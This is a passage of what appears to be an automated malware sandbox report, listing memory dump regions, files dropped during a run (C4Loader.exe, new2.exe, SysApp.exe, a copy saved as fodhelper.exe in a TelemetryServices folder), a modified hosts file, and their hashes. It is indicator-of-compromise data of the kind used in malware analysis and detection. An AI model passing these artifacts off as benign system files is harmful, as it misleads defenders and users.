memory/4712-143-0x0000000004BF0000-0x0000000004C12000-memory.dmp
memory/4712-144-0x00000000053C0000-0x0000000005426000-memory.dmp
memory/4712-145-0x00000000054A0000-0x0000000005506000-memory.dmp
memory/4712-146-0x0000000004890000-0x00000000048AE000-memory.dmp
memory/4712-147-0x0000000006060000-0x0000000006092000-memory.dmp
memory/4712-148-0x00000000741D0000-0x000000007421C000-memory.dmp
memory/4712-149-0x0000000006040000-0x000000000605E000-memory.dmp
memory/4712-150-0x0000000007400000-0x0000000007A7A000-memory.dmp
memory/4712-151-0x0000000006DB0000-0x0000000006DCA000-memory.dmp
memory/4712-152-0x0000000006E20000-0x0000000006E2A000-memory.dmp
memory/4712-153-0x0000000007070000-0x0000000007106000-memory.dmp
memory/4712-154-0x0000000006FE0000-0x0000000006FEE000-memory.dmp
memory/4712-155-0x0000000007030000-0x000000000704A000-memory.dmp
memory/4712-156-0x0000000007020000-0x0000000007028000-memory.dmp
memory/4712-157-0x0000000007140000-0x0000000007162000-memory.dmp
memory/4712-158-0x0000000008030000-0x00000000085D4000-memory.dmp
memory/3080-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/4348-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/3080-164-0x0000000000F70000-0x00000000010DC000-memory.dmp
memory/3896-165-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/3080-167-0x00000000059E0000-0x0000000005A72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/3992-169-0x0000000000000000-mapping.dmp
memory/3080-172-0x0000000005EA0000-0x0000000005EAA000-memory.dmp
memory/2308-173-0x0000000000000000-mapping.dmp
memory/2308-174-0x0000000000620000-0x0000000000640000-memory.dmp
memory/2308-179-0x00000000052E0000-0x00000000058F8000-memory.dmp
memory/2308-180-0x0000000004D40000-0x0000000004D52000-memory.dmp
memory/2308-181-0x0000000004E70000-0x0000000004F7A000-memory.dmp
memory/2308-182-0x0000000004DB0000-0x0000000004DEC000-memory.dmp
memory/3896-183-0x0000000002346000-0x000000000284A000-memory.dmp
memory/2308-184-0x00000000050E0000-0x0000000005156000-memory.dmp
memory/2308-185-0x0000000005A00000-0x0000000005A1E000-memory.dmp
memory/3896-186-0x0000000002852000-0x000000000298F000-memory.dmp
memory/2308-187-0x0000000006890000-0x0000000006A52000-memory.dmp
memory/2308-188-0x0000000006F90000-0x00000000074BC000-memory.dmp
memory/3896-189-0x0000000002346000-0x000000000284A000-memory.dmp
memory/4320-190-0x0000014CA8860000-0x0000014CA8882000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cb2f0a508942eda5f5930590af1771a8 |
| SHA1 | bdf1773f9cf85bad96852b519c23469c249d14c0 |
| SHA256 | 95b8d0f382dec1c9b0f5e99c3f568279287198de577ba95dbbaaa00710151db2 |
| SHA512 | 839a577a0e6d1686a83c85664faeddac7aecc6b9b00b4a34bcc2bfc226384e006ff08741fa4ff84e29e55a0e1496e400d19701df2f1c7c91f6ee68a685cae7cf |
memory/4320-192-0x00007FFAB64A0000-0x00007FFAB6F61000-memory.dmp
memory/2308-193-0x0000000006830000-0x0000000006880000-memory.dmp
memory/4320-194-0x00007FFAB64A0000-0x00007FFAB6F61000-memory.dmp
memory/492-195-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3532-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7ce8cefc3f798abe5abd683d0ef26dd |
| SHA1 | b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e |
| SHA256 | 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a |
| SHA512 | c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64 |
memory/3052-198-0x0000000000000000-mapping.dmp
memory/4648-200-0x0000000000000000-mapping.dmp
memory/4888-201-0x0000000000000000-mapping.dmp
memory/3612-202-0x0000000000000000-mapping.dmp
memory/4932-203-0x0000000000000000-mapping.dmp
memory/4924-204-0x0000000000000000-mapping.dmp
memory/4960-205-0x0000000000000000-mapping.dmp
memory/4808-206-0x00007FFAB64A0000-0x00007FFAB6F61000-memory.dmp
memory/2720-207-0x0000000000000000-mapping.dmp
memory/4808-208-0x00007FFAB64A0000-0x00007FFAB6F61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1924-210-0x00007FF642D21938-mapping.dmp
memory/3896-211-0x0000000002852000-0x000000000298F000-memory.dmp
memory/836-212-0x00007FFAB65C0000-0x00007FFAB7081000-memory.dmp
memory/836-213-0x00007FFAD61B0000-0x00007FFAD63A5000-memory.dmp
memory/836-214-0x00007FFAD5F20000-0x00007FFAD5FDE000-memory.dmp
memory/2340-216-0x0000000140002314-mapping.dmp
memory/2340-215-0x0000000140000000-0x0000000140029000-memory.dmp
memory/2340-218-0x0000000140000000-0x0000000140029000-memory.dmp
memory/2340-219-0x00007FFAD61B0000-0x00007FFAD63A5000-memory.dmp
memory/2340-220-0x00007FFAD5F20000-0x00007FFAD5FDE000-memory.dmp
memory/836-221-0x00007FFAD61B0000-0x00007FFAD63A5000-memory.dmp
memory/836-222-0x00007FFAD5F20000-0x00007FFAD5FDE000-memory.dmp
memory/2340-223-0x0000000140000000-0x0000000140029000-memory.dmp
memory/604-224-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/672-225-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2340-227-0x00007FFAD61B0000-0x00007FFAD63A5000-memory.dmp
memory/2180-255-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2320-256-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/672-257-0x000001B655800000-0x000001B655821000-memory.dmp
memory/960-260-0x000001F577500000-0x000001F577527000-memory.dmp
memory/376-259-0x00000204D15D0000-0x00000204D15F7000-memory.dmp
memory/672-258-0x000001B655830000-0x000001B655857000-memory.dmp
memory/524-261-0x000001AB4E510000-0x000001AB4E537000-memory.dmp
memory/8-254-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1876-253-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/656-262-0x000001B2B0180000-0x000001B2B01A7000-memory.dmp
memory/2012-252-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2004-251-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1928-250-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1916-249-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1828-248-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1804-247-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1732-246-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1636-245-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1616-244-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1560-243-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1252-238-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1364-237-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/604-234-0x00000276D0F50000-0x00000276D0F77000-memory.dmp
memory/2792-271-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2800-270-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2700-269-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2732-268-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2692-267-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2560-266-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2552-265-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2420-264-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2352-263-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1164-233-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1040-232-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1032-231-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/656-230-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/524-229-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1552-242-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1416-241-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1428-240-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1384-239-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1216-236-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1180-235-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/376-226-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/960-228-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1032-272-0x00000222EEAB0000-0x00000222EEAD7000-memory.dmp
memory/2808-275-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/3876-280-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/2824-277-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/1216-294-0x00000225F82B0000-0x00000225F82D7000-memory.dmp
memory/1180-293-0x0000020AD1A80000-0x0000020AD1AA7000-memory.dmp
memory/1164-276-0x0000029C7A7C0000-0x0000029C7A7E7000-memory.dmp
memory/3564-279-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
memory/3140-278-0x00007FFA96230000-0x00007FFA96240000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 4ac8a26e2cee1347880edccb47ab30ea |
| SHA1 | a629f6d453014c9dccb98987e1f4b0a3d4bdd460 |
| SHA256 | de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a |
| SHA512 | fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a |
memory/1040-273-0x000001B077520000-0x000001B077547000-memory.dmp
memory/4440-295-0x0000000000000000-mapping.dmp
memory/1364-296-0x00000151F70F0000-0x00000151F7117000-memory.dmp
memory/1356-299-0x0000000000000000-mapping.dmp
memory/1416-304-0x0000021A8C190000-0x0000021A8C1B7000-memory.dmp
memory/1552-306-0x000001888C920000-0x000001888C947000-memory.dmp
memory/1356-305-0x000001E95DEA0000-0x000001E95DEC7000-memory.dmp
memory/3560-312-0x0000000000000000-mapping.dmp
memory/4440-303-0x000001DD886F0000-0x000001DD88717000-memory.dmp
memory/1428-302-0x0000028A9E380000-0x0000028A9E3A7000-memory.dmp
memory/1384-301-0x00000251B52E0000-0x00000251B5307000-memory.dmp
memory/1252-298-0x00000236712F0000-0x0000023671317000-memory.dmp
memory/2304-315-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB93.tmp.csv
| MD5 | 1894dbef83f569e8330fa98d9f154e24 |
| SHA1 | 27746d992a48c91ed43773cf4ad2b0d2ae334fe1 |
| SHA256 | d97ea0c731c7e3b960f62c4adc4c5517b0c271b988b13d28da14dc0451e2ed5d |
| SHA512 | ac55e6a842ed69ec31d30a29d94e2b0bd56a8aff8eb6e800822e86188e892cd16e5ac9fff3256b01f4a0a33e922aae11ae54b342dce4e1638b384939264d0830 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBF3.tmp.txt
| MD5 | f4757ca46656597c123fe91fef1c8d28 |
| SHA1 | 22f04df1c5da08b4522a09ee44a0a123a1e00c72 |
| SHA256 | cb1d7bb7c901028c9c8d483ad614912192c356a0f206b11062fb4c7b00609518 |
| SHA512 | 25dfb4806cba9b10f5fc46dc4b125477acf10ad7ed952b7d6afcce437ca60747a143071a2de3523ce5bd0f22d6e4414c1920c12c5e4b0c3d27f46f2910a4f27c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBE3.tmp.csv
| MD5 | 1115ee1d46ca27e0f92f89539feecf1f |
| SHA1 | dda5f8ecb437cc53084ce6f3bd921c13c08f8d5e |
| SHA256 | 51932aaf5c141f8425f1f173e3261ed126e2ed68a3d51312a951b4b3b5cead93 |
| SHA512 | 6fa23b193c61639a6f9bbd2b8cf158ca310c1bae5240eb0c62b782188592a510eeab9787e97593e9e877cff79c87123f2a47143ccdddf2e7035f8e6a3838f89e |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC52.tmp.txt
| MD5 | b32f423fcddd838b8a41ceafec8a9115 |
| SHA1 | 7105a43b6d7eeaab21fd93fa2daf075393fa7676 |
| SHA256 | 236f9258c034bd80dc5ef6571018ad261ff1d8a0e4e44b2090aea81cdc4c97d2 |
| SHA512 | e535ca0ea824b93c526c852afb4457e6fb4e99e8f4430ec76eba99a894d41cb4f71606cf5375c103b75c5ab12163dac019afa3564fb2aa8d5ba4845282080987 |
memory/3436-373-0x0000000000000000-mapping.dmp
memory/716-377-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/3736-382-0x0000000000000000-mapping.dmp
memory/100-388-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER65F1.tmp.csv
| MD5 | 6ba946cb3b5bf38edfe7d409ade48a96 |
| SHA1 | f32c78c4d55fe1430bc2fb07f8082e6367d3440a |
| SHA256 | 4b0f473dba4f41ab11846e5cfc045b3af76d7f94ddcf775aef2a813f2be152a5 |
| SHA512 | 8eeb0c462eab18ebd9a36e09180e1f214c479f6515b6312148066c0b35689f9ec7e066cd373020f6276f01bac028008e41341c66ea6e5b84f33a5d99a0b6f6db |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6630.tmp.txt
| MD5 | b780e661bacdc6caf81b7b13dbb88979 |
| SHA1 | f314556b82844f19d8df04984d4de22f278335b9 |
| SHA256 | 94bd91b2658a846ae728de983f1abecb8bbbaa07efc31aa5fc291e0c01f6452b |
| SHA512 | b9f79de28a7b8221d9ef18a6c889063d05bb6df421ef2544f572b09c1ccf28f8cdeb3469a1c27e383fd608beeb7e5d28ea97c8bc812d03ca0d5d79db2a859bd5 |
memory/5024-400-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
| MD5 | bed2ccf5544f57481646a39355951bc2 |
| SHA1 | 2793df54fc6c67d8fc76e5f299551398bed1ca81 |
| SHA256 | 1a87fba1c9ed624c634dc30a63e62b07c073c3634cc51137269ce0816e17d6f6 |
| SHA512 | 12474c8d4abb19b90587196c7365769cffff48e5c069a969b69a58210ba493de4e6218a85a93f731bc973c43b56611d9d2f546449b301432c81e77e8ed0ab8ef |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
| MD5 | 947ae80fae66782d640746f4ee8c212b |
| SHA1 | 0c698989cc705fca522c0711dded96700cd8de8e |
| SHA256 | 8aef87a8942ea5077659ec406cf93d8a073fd6d646cf6c68e25fd0a3bdac1400 |
| SHA512 | 55d08f3bbfd2c9882c266a852260f53b1bc5d6f6abfd1bc713f64059bc77c5f62ae96694e12fe8cde59e67a7876aa2918874c70cee37c7ccafdb9e9088689a63 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
| MD5 | 4b733410cd95f9990eed5d0df5fde18d |
| SHA1 | 52ac2cb8037e4846ba60fdb1f20883b56808bd31 |
| SHA256 | cf473cf45c70862bddc2d92da375cd595d457cadfd725f199dceaa3377e3814d |
| SHA512 | 4cdf766622194e11443d978e3b1bb780d2fa0036fc170e6c3bc258cded18603f41a3ab9ca3a6165535de867e4a4e645109c6a3f2442e45988000cf24fa72b1f8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
| MD5 | 68cd6526560b400b8c1e3c4dbeb5e957 |
| SHA1 | 062e4345d13fe63e73574abd1d1cc06be92093b4 |
| SHA256 | 638b6cc16be7b923cc9b3d21197d9af629487634258dab08db69b97b279cb849 |
| SHA512 | 4d1d5ffbc20e626e40b9de02bc45811cccf19fbedb46e0099f5cfbe1d2b67b02a0a70097e11ab4eccba8e974efb3109039a6d8f3066efde91757a288bfeb5d27 |
memory/3572-408-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C6B.tmp.csv
| MD5 | 07faea265b934fc08a01376108efa5ff |
| SHA1 | cac1aaf9d4d12a92a0d2ad8bfc35734b27965011 |
| SHA256 | 1e48367811f32db0da44ad34c3ebf216e174de01082a7ca37019fb78ce678c3b |
| SHA512 | d5750c9333640025c2933422a110a7135e8b5073a22c98201e54611dadb600d2e8e824679f244f5d425f0696885f037264a223354debde232778f8028abaccce |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CBA.tmp.txt
| MD5 | eeffa2debd91283dc697f2e1a1910390 |
| SHA1 | 39f85063e34ddd4791d03ca5a97313f8e41b5f95 |
| SHA256 | 6a4891b6b29d6543f276496975c1ae4814d6c6011cf71e826aa450674d35a4f6 |
| SHA512 | 472bfc671ad8903cf07cfbd0234900eb2106f312d5a5c00963dba115d48c9f1f106d763d05fdc8523e2f4547f1f412122fe545b8703f5b9aa2a9711248ed0eea |
memory/4792-420-0x0000000000000000-mapping.dmp